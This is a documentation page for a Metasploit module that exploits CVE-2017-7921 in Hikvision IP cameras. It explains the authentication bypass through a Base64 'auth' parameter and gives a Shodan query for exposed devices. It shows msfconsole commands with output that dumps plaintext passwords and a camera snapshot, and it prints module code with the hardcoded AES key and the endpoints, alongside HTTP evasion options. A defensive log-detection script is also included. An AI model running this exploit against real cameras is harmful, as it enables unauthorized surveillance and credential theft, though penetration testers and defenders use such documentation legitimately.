Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera - Metasploit
This page contains detailed information about how to use the auxiliary/gather/hikvision_info_disclosure_cve_2017_7921 Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera
Module: auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
Source code: modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
Disclosure date: 2017-09-23
Last modification time: 2022-10-17 19:54:26 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-7921
Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure of camera information, such as detailed hardware and software configuration, user credentials, and camera snapshots. The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names. Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time of publishing (shodan search: "App-webs" "200 OK"). This module allows the attacker to retrieve this information without any authentication. The information is stored in loot for future use.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
msf auxiliary(hikvision_info_disclosure_cve_2017_7921) > show targets
... a list of targets ...
msf auxiliary(hikvision_info_disclosure_cve_2017_7921) > set TARGET target-id
msf auxiliary(hikvision_info_disclosure_cve_2017_7921) > show options
... show and set options ...
msf auxiliary(hikvision_info_disclosure_cve_2017_7921) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure of camera information, such as detailed hardware and software configuration, user credentials, and camera snapshots.
This module allows the attacker to disclose this information without the need for authentication by abusing the improper authentication logic: it sends the server a request containing an auth parameter in the query string, which holds a Base64-encoded version of the authorization in username:password format. Vulnerable cameras will ignore the password part and will instead use the username part of this string as the user to log in. Using user admin will allow an attacker to retrieve and disclose any information of the targeted device.
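A detection sketch for the request pattern described above, as an added example that is not part of the module or of the original page: it scans access-log lines for requests that carry an auth query parameter on the endpoints this module requests, and decodes the Base64 value to report the claimed username. The endpoint paths are the ones passed to normalize_uri in the module snippets on this page; the Combined Log Format input (as a reverse proxy or web gateway in front of the camera would write it), the sample lines and all helper names are assumptions made for illustration.

```ruby
require 'base64'

# Endpoints the module requests (from the normalize_uri calls quoted on this
# page), lower-cased; paths are compared case-insensitively and by suffix so a
# non-root base path is still flagged.
WATCHED_PATHS = %w[
  /System/configurationFile
  /Security/users
  /System/deviceInfo
  /Network/interfaces
  /System/Storage/volumes
  /Streaming/channels/1/picture
].map(&:downcase).freeze

# Assumption: Combined Log Format written by a proxy in front of the camera.
LOG_RE = /\A(?<src>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+)[^"]*" (?<status>\d{3})/.freeze

Finding = Struct.new(:src, :ts, :path, :status, :claimed_user, :outcome)

# Undo %XX escapes so percent-encoded paths and values are compared in clear.
def pct_decode(str)
  str.b.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
     .force_encoding('UTF-8').scrub('?')
end

# Return the value of one query parameter, or nil when it is absent.
def query_param(query, name)
  query.split('&').each do |pair|
    key, value = pair.split('=', 2)
    return pct_decode(value.to_s) if key && pct_decode(key) == name
  end
  nil
end

# Username claimed in a Base64 "username:password" value, or nil when the
# value does not decode to that shape. The password part is never kept.
def claimed_user(auth_value)
  padded = auth_value + ('=' * ((4 - (auth_value.length % 4)) % 4))
  decoded = Base64.strict_decode64(padded).force_encoding('UTF-8')
  user, sep, _rest = decoded.partition(':')
  return nil if sep.empty? || user.empty? || !user.valid_encoding?

  user
rescue ArgumentError
  nil
end

# Turn one log line into a Finding, or nil when it is not of interest.
def inspect_line(line)
  m = LOG_RE.match(line)
  return nil unless m

  raw_path, query = m[:target].split('?', 2)
  return nil unless query

  path = pct_decode(raw_path)
  return nil unless WATCHED_PATHS.any? { |p| path.downcase.end_with?(p) }

  auth = query_param(query, 'auth')
  return nil unless auth

  status = m[:status].to_i
  # The module treats HTTP 200 as success, so 200 means data was served.
  outcome = status == 200 ? :served : :rejected
  Finding.new(m[:src], m[:ts], path, status, claimed_user(auth), outcome)
end

def scan(lines)
  lines.map { |line| inspect_line(line.chomp) }.compact
end

# Constructed sample input (documentation address ranges, made-up sizes).
SAMPLE_LOG = <<~'LOG'
  198.51.100.7 - - [02/Oct/2022:17:23:46 +0000] "GET /Security/users?auth=YWRtaW46eA== HTTP/1.1" 200 512
  198.51.100.7 - - [02/Oct/2022:17:23:48 +0000] "GET /Streaming/channels/1/picture?snapShotImageType=JPEG&auth=YWRtaW46eA%3D%3D HTTP/1.1" 200 48211
  192.0.2.10 - - [02/Oct/2022:17:24:01 +0000] "GET /System/deviceInfo HTTP/1.1" 401 0
  192.0.2.10 - - [02/Oct/2022:17:24:05 +0000] "GET /index.html?auth=YWRtaW46eA== HTTP/1.1" 200 900
  203.0.113.9 - - [02/Oct/2022:17:25:10 +0000] "GET /system/DEVICEINFO?auth=not-base64 HTTP/1.1" 401 0
LOG

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LOG.lines).each do |f|
    puts format('%-14s %-9s user=%-8s %d %s',
                f.src, f.outcome, f.claimed_user.inspect, f.status, f.path)
  end
end
```

A finding with outcome served on a camera address means the device answered the request and should be treated as having disclosed the corresponding data; a rejected finding is still a probe worth correlating by source address.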
The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
- DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
- DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
- DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
- DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
- DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
- DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
- DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
Verification Steps
This module has been tested against a Hikvision camera with the specifications listed below:
- MANUFACTURER: Hikvision.China
- MODEL: DS-2CD2142FWD-IS
- FIRMWARE VERSION: V5.4.1
- FIRMWARE RELEASE: build 160525
- BOOT VERSION: V1.3.4
- BOOT RELEASE: 100316
use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
set RHOSTS <TARGET HOSTS>
set RPORT <port>
check
set PRINT true
set ACTION Automatic
run
- You should get a full disclosure of all camera information supported by this module.
Options
PRINT
This option allows you to print all information collected to the console during execution, except for camera snapshots.
Actions
Automatic
Retrieves all information supported by this module.
Configuration
Retrieves the camera hardware and software configuration
Credentials
Retrieves all configured users, including the passwords in plain text format, and stores them in the database. This can be checked by using the command creds -O <target IP> at the Metasploit prompt.
Snapshot
Takes a camera snapshot and stores it as a JPEG file in loot.
All information disclosed is stored in loot by default.
Scenarios
Hikvision Camera DS-2CD2142FWD-IS -> firmware version V5.4.1, build 160525
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set ACTION Automatic
ACTION => Automatic
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set PRINT true
PRINT => true
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > options
Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
PRINT true no Print output to console (not applicable for snapshot)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.100.180 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Automatic Dump all information
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > check
[+] 192.168.100.180:80 - The target is vulnerable.
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > run
[*] Running module against 192.168.100.180
[*] Running in automatic mode
[*] Getting the user credentials...
[*] Credentials for user:admin are added to the database...
[*] Credentials for user:admln are added to the database...
[*] User Credentials Information:
-----------------------------
Username:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
Username:admln | ID:2 | Role:Operator | Password: asdf1234
[+] User credentials are successfully saved to /root/.msf4/loot/20221002172346_default_192.168.100.180_hikvision.creden_049224.txt
[*] Getting the camera hardware and software configuration...
[*] Camera Device Information:
--------------------------
Device name: IP CAMERA
Device ID: 88
Device description: IPCamera
Device manufacturer: Hikvision.China
Device model: DS-2CD2142FWD-IS
Device S/N: DS-2CD2142FWD-IS2016HS77777777777
Device MAC: bc:ad:28:ff:ff:ff
Device firware version: V5.4.1
Device firmware release: build 160525
Device boot version: V1.3.4
Device boot release: 100316
Device hardware version: 0x0
Camera Network Information:
---------------------------
IP interface: 1
IP version: v4
IP assignment: static
IP address: 192.168.100.180
IP subnet mask: 255.255.255.0
Default gateway: 192.168.100.1
Primary DNS: 8.8.8.8
Camera Storage Information:
---------------------------
Storage volume name: HDD1
Storage volume ID: 1
Storage volume description: DAS
Storage device: HDD
Storage type: internal
Storage capacity (MB): 30543
Storage device status: HD_NORMAL
[+] Camera configuration details are successfully saved to /root/.msf4/loot/20221002172347_default_192.168.100.180_hikvision.config_549113.txt
[*] Taking a camera snapshot...
[+] Camera snapshot is successfully saved to /root/.msf4/loot/20221002172348_default_192.168.100.180_hikvision.image_963468.bin
[*] Auxiliary module execution completed
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.180
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.100.180 192.168.100.180 80/tcp (http) admln asdf1234 Password
192.168.100.180 192.168.100.180 80/tcp (http) admin Pa$$W0rd Password
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) >
Limitations
No limitations are identified so far using this module.
Msfconsole Usage
Here is how the gather/hikvision_info_disclosure_cve_2017_7921 auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > show info
Name: Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera
Module: auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-09-23
Provided by:
Monte Crypto
h00die-gr3y <h00die.gr3y[at]gmail.com>
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Available actions:
Name Description
---- -----------
Automatic Dump all information
Configuration Dump camera hardware and software configuration
Credentials Dump all credentials and passwords
Snapshot Take a camera snapshot
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PRINT true no Print output to console (not applicable for snapshot)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Description:
Many Hikvision IP cameras have improper authorization logic that
allows unauthenticated information disclosure of camera information,
such as detailed hardware and software configuration, user
credentials, and camera snapshots. The vulnerability has been
present in Hikvision products since 2014. In addition to
Hikvision-branded devices, it affects many white-labeled camera
products sold under a variety of brand names. Hundreds of thousands
of vulnerable devices are still exposed to the Internet at the time
of publishing (shodan search: "App-webs" "200 OK"). This module
allows the attacker to retrieve this information without any
authentication. The information is stored in loot for future use.
References:
https://nvd.nist.gov/vuln/detail/CVE-2017-7921
https://packetstormsecurity.com/files/144097
https://ipvm.com/reports/hik-exploit
https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921
http://seclists.org/fulldisclosure/2017/Sep/23
Module Options
This is a complete list of options available in the gather/hikvision_info_disclosure_cve_2017_7921 auxiliary module:
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > show options
Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
PRINT true no Print output to console (not applicable for snapshot)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Automatic Dump all information
Advanced Options
Here is a complete list of advanced options supported by the gather/hikvision_info_disclosure_cve_2017_7921 auxiliary module:
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > show advanced
Module advanced options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0 no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/hikvision_info_disclosure_cve_2017_7921 module can do:
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > show actions
Auxiliary actions:
Name Description
---- -----------
Automatic Dump all information
Configuration Dump camera hardware and software configuration
Credentials Dump all credentials and passwords
Snapshot Take a camera snapshot
Evasion Options
Here is the full list of possible evasion options supported by the gather/hikvision_info_disclosure_cve_2017_7921 auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::shuffle_get_params false no Randomize order of GET parameters
HTTP::shuffle_post_params false no Randomize order of POST parameters
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Error Messages
This module may fail with the following error messages:
- <PEER> - Communication error occurred: <E.MESSAGE>
- <PEER> - Communication error occurred: <E.MESSAGE>
- Target server did not respond to the configuration file download request.
- Target server did not respond to the credentials request.
- No users were found in the returned CSS code!
- Could not retrieve password for user:<VALUE> from the camera configuration file!
- Response code invalid for obtaining the user credentials.
- Target server did not respond to the device info request.
- No device info was found in the returned CSS code!
- Response code invalid for obtaining camera hardware and software configuration.
- Target server did not respond to the network info request.
- No network info was found in the returned CSS code!
- Response code invalid for obtaining camera network configuration.
- Target server did not respond to the storage info request.
- No storage info was found in the returned CSS code!
- Response code invalid for obtaining camera storage configuration.
- Target server did not respond to the snapshot request.
- Response code invalid for obtaining a camera snapshot.
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
      'auth' => auth.strip
    }
  })
  return res
rescue StandardError => e
  print_error("#{peer} - Communication error occurred: #{e.message}")
  elog("#{peer} - Communication error occurred: #{e.message}", error: e)
  return nil
end

def report_creds(user, pwd)
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
    }
  })
  return res
rescue StandardError => e
  print_error("#{peer} - Communication error occurred: #{e.message}")
  elog("#{peer} - Communication error occurred: #{e.message}", error: e)
  return nil
end

def report_creds(user, pwd)
  credential_data = {
Target server did not respond to the configuration file download request.
Here is a relevant code snippet related to the "Target server did not respond to the configuration file download request." error message:
# Get AES128-ECB encrypted camera configuration file with user and password information
uri = normalize_uri(target_uri.path, 'System', 'configurationFile')
aes_data = get_info(uri)

if aes_data.nil?
  print_error('Target server did not respond to the configuration file download request.')
elsif aes_data.code == 200
  # decrypt configuration file data with the weak AES128-ECB encryption hex key: 279977f62f6cfd2d91cd75b889ce0c9a
  decipher = OpenSSL::Cipher.new('aes-128-ecb')
  decipher.decrypt
  decipher.key = [AES_KEY].pack('H*') # transform hex key to a 16-byte (128-bit) key
Target server did not respond to the credentials request.
Here is a relevant code snippet related to the "Target server did not respond to the credentials request." error message:
print_status('Getting the user credentials...')
uri = normalize_uri(target_uri.path, 'Security', 'users')
creds_info = get_info(uri)

if creds_info.nil?
  print_error('Target server did not respond to the credentials request.')
elsif creds_info.code == 200
  # process XML output and store output in loot_data
  xml_creds_info = creds_info.get_xml_document
  if xml_creds_info.blank?
    print_error('No users were found in the returned CSS code!')
No users were found in the returned CSS code!
Here is a relevant code snippet related to the "No users were found in the returned CSS code!" error message:
  print_error('Target server did not respond to the credentials request.')
elsif creds_info.code == 200
  # process XML output and store output in loot_data
  xml_creds_info = creds_info.get_xml_document
  if xml_creds_info.blank?
    print_error('No users were found in the returned CSS code!')
  else
    # Download the camera configuration file and decrypt it
    text_data = decrypt_config
    loot_data << "User Credentials Information:\n"
    loot_data << "-----------------------------\n"
Could not retrieve password for user:<VALUE> from the camera configuration file!
Here is a relevant code snippet related to the "Could not retrieve password for user:<VALUE> from the camera configuration file!" error message:
xml_creds_info.css('User').each do |user|
  unless text_data.empty?
    # Filter out password based on user name and store credentials in the database
    i = text_data.each_with_index.select { |text_chunk, _index| text_chunk == user.at_css('userName').content }.map { |pair| pair[1] }
    if i.empty?
      print_error("Could not retrieve password for user:#{user.at_css('userName').content} from the camera configuration file!")
    else
      pwd = text_data[i.last + 1]
      report_creds(user.at_css('userName').content, pwd)
    end
  end
Response code invalid for obtaining the user credentials.
Here is a relevant code snippet related to the "Response code invalid for obtaining the user credentials." error message:
      end
      loot_data << "User:#{user.at_css('userName').content} | ID:#{user.at_css('id').content} | Role:#{user.at_css('userLevel').content} | Password: #{pwd}\n"
    end
  end
else
  print_error('Response code invalid for obtaining the user credentials.')
end
unless loot_data.empty?
  if datastore['PRINT']
    print_status(loot_data.to_s)
  end
Target server did not respond to the device info request.
Here is a relevant code snippet related to the "Target server did not respond to the device info request." error message:
print_status('Getting the camera hardware and software configuration...')
uri = normalize_uri(target_uri.path, 'System', 'deviceInfo')
device_info = get_info(uri)

if device_info.nil?
  print_error('Target server did not respond to the device info request.')
elsif device_info.code == 200
  # process XML output and store in loot_data
  xml_device_info = device_info.get_xml_document
  if xml_device_info.blank?
    print_error('No device info was found in the returned CSS code!')
No device info was found in the returned CSS code!
Here is a relevant code snippet related to the "No device info was found in the returned CSS code!" error message:
  print_error('Target server did not respond to the device info request.')
elsif device_info.code == 200
  # process XML output and store in loot_data
  xml_device_info = device_info.get_xml_document
  if xml_device_info.blank?
    print_error('No device info was found in the returned CSS code!')
  else
    loot_data << "Camera Device Information:\n"
    loot_data << "--------------------------\n"
    xml_device_info.css('DeviceInfo').each do |device|
      loot_data << "Device name: #{device.at_css('deviceName').content}\n"
Response code invalid for obtaining camera hardware and software configuration.
Here is a relevant code snippet related to the "Response code invalid for obtaining camera hardware and software configuration." error message:
      loot_data << "Device hardware version: #{device.at_css('hardwareVersion').content}\n"
    end
    loot_data << "\n"
  end
else
  print_error('Response code invalid for obtaining camera hardware and software configuration.')
end

# Get network configuration
uri = normalize_uri(target_uri.path, 'Network', 'interfaces')
network_info = get_info(uri)
Target server did not respond to the network info request.
Here is a relevant code snippet related to the "Target server did not respond to the network info request." error message:
# Get network configuration
uri = normalize_uri(target_uri.path, 'Network', 'interfaces')
network_info = get_info(uri)

if network_info.nil?
  print_error('Target server did not respond to the network info request.')
elsif network_info.code == 200
  # process XML output and store in loot_data
  xml_network_info = network_info.get_xml_document
  if xml_network_info.blank?
    print_error('No network info was found in the returned CSS code!')
No network info was found in the returned CSS code!
Here is a relevant code snippet related to the "No network info was found in the returned CSS code!" error message:
  print_error('Target server did not respond to the network info request.')
elsif network_info.code == 200
  # process XML output and store in loot_data
  xml_network_info = network_info.get_xml_document
  if xml_network_info.blank?
    print_error('No network info was found in the returned CSS code!')
  else
    loot_data << "Camera Network Information:\n"
    loot_data << "---------------------------\n"
    xml_network_info.css('NetworkInterface').each do |interface|
      loot_data << "IP interface: #{interface.at_css('id').content}\n"
Response code invalid for obtaining camera network configuration.
Here is a relevant code snippet related to the "Response code invalid for obtaining camera network configuration." error message:
      end
    end
    loot_data << "\n"
  end
else
  print_error('Response code invalid for obtaining camera network configuration.')
end

# Get storage configuration
uri = normalize_uri(target_uri.path, 'System', 'Storage', 'volumes')
storage_info = get_info(uri)
Target server did not respond to the storage info request.
Here is a relevant code snippet related to the "Target server did not respond to the storage info request." error message:
# Get storage configuration
uri = normalize_uri(target_uri.path, 'System', 'Storage', 'volumes')
storage_info = get_info(uri)

if storage_info.nil?
  print_error('Target server did not respond to the storage info request.')
elsif storage_info.code == 200
  # process XML output and store in loot
  xml_storage_info = storage_info.get_xml_document
  if xml_storage_info.blank?
    print_error('No storage info was found in the returned CSS code!')
No storage info was found in the returned CSS code!
Here is a relevant code snippet related to the "No storage info was found in the returned CSS code!" error message:
  print_error('Target server did not respond to the storage info request.')
elsif storage_info.code == 200
  # process XML output and store in loot
  xml_storage_info = storage_info.get_xml_document
  if xml_storage_info.blank?
    print_error('No storage info was found in the returned CSS code!')
  else
    loot_data << "Camera Storage Information:\n"
    loot_data << "---------------------------\n"
    xml_storage_info.css('StorageVolume').each do |volume|
      loot_data << "Storage volume name: #{volume.at_css('volumeName').content}\n"
Response code invalid for obtaining camera storage configuration.
Here is a relevant code snippet related to the "Response code invalid for obtaining camera storage configuration." error message:
      loot_data << "Storage capacity (MB): #{volume.at_css('capacity').content}\n"
      loot_data << "Storage device status: #{volume.at_css('status').content}\n"
    end
  end
else
  print_error('Response code invalid for obtaining camera storage configuration.')
end
unless loot_data.empty?
  if datastore['PRINT']
    print_status(loot_data.to_s)
  end
Target server did not respond to the snapshot request.
Here is a relevant code snippet related to the "Target server did not respond to the snapshot request." error message:
print_status('Taking a camera snapshot...')
uri = normalize_uri(target_uri.path, 'Streaming', 'channels', '1', 'picture?snapShotImageType=JPEG')
res = get_info(uri)

if res.nil?
  print_error('Target server did not respond to the snapshot request.')
elsif res.code == 200
  jpeg_image = res.body
else
  print_error('Response code invalid for obtaining a camera snapshot.')
end
Response code invalid for obtaining a camera snapshot.
Here is a relevant code snippet related to the "Response code invalid for obtaining a camera snapshot." error message:
if res.nil?
  print_error('Target server did not respond to the snapshot request.')
elsif res.code == 200
  jpeg_image = res.body
else
  print_error('Response code invalid for obtaining a camera snapshot.')
end
unless jpeg_image.nil?
  loot_path = store_loot('hikvision.image', 'jpeg/image', datastore['RHOSTS'], jpeg_image, 'snapshot', 'camera snapshot')
  print_good("Camera snapshot is successfully saved to #{loot_path}")
end
Related Pull Requests
- #17225 Merged Pull Request: Update YARD documentation to use proper @return instead of @returns
- #17219 Merged Pull Request: Fix broken zabbix_login scanner regex for new versions
- #17220 Merged Pull Request: Fix pe inject payload crash
- #17196 Merged Pull Request: Msf::Post::Windows: Add Msf::Post::Windows::System mixin
- #17192 Merged Pull Request: Password Manager Pro password recovery post module
- #17213 Merged Pull Request: Update identify hash library and call
- #17207 Merged Pull Request: Add msfvenom / msfconsole support for Rust shellcode
- #17190 Merged Pull Request: Fix the Netapi32 bufptr data type
- #17174 Merged Pull Request: FLIR AX8 thermal camera unauthenticated RCE [CVE-2022-37061]
- #17142 Merged Pull Request: Apache CouchDB Erlang RCE module CVE-2022-24706
- #17168 Merged Pull Request: Add module for Webmin auth File Manager RCE (CVE-2022-0824)
References
- CVE-2017-7921
- PACKETSTORM-144097
- https://ipvm.com/reports/hik-exploit
- https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921
- http://seclists.org/fulldisclosure/2017/Sep/23
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
- exploit/linux/http/hikvision_cve_2021_36260_blind
- exploit/linux/misc/hikvision_rtsp_bof
- auxiliary/gather/browser_info
- auxiliary/gather/huawei_wifi_info
- auxiliary/gather/xymon_info
- auxiliary/gather/zookeeper_info_disclosure
- auxiliary/gather/c2s_dvr_password_disclosure
- auxiliary/gather/cerberus_helpdesk_hash_disclosure
- auxiliary/gather/eventlog_cred_disclosure
- auxiliary/gather/f5_bigip_cookie_disclosure
- auxiliary/gather/flash_rosetta_jsonp_url_disclosure
- auxiliary/gather/ipcamera_password_disclosure
- auxiliary/gather/jetty_web_inf_disclosure
- auxiliary/gather/netgear_password_disclosure
- auxiliary/gather/pulse_secure_file_disclosure
- auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key
Authors
- Monte Crypto
- h00die-gr3y <h00die.gr3y[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.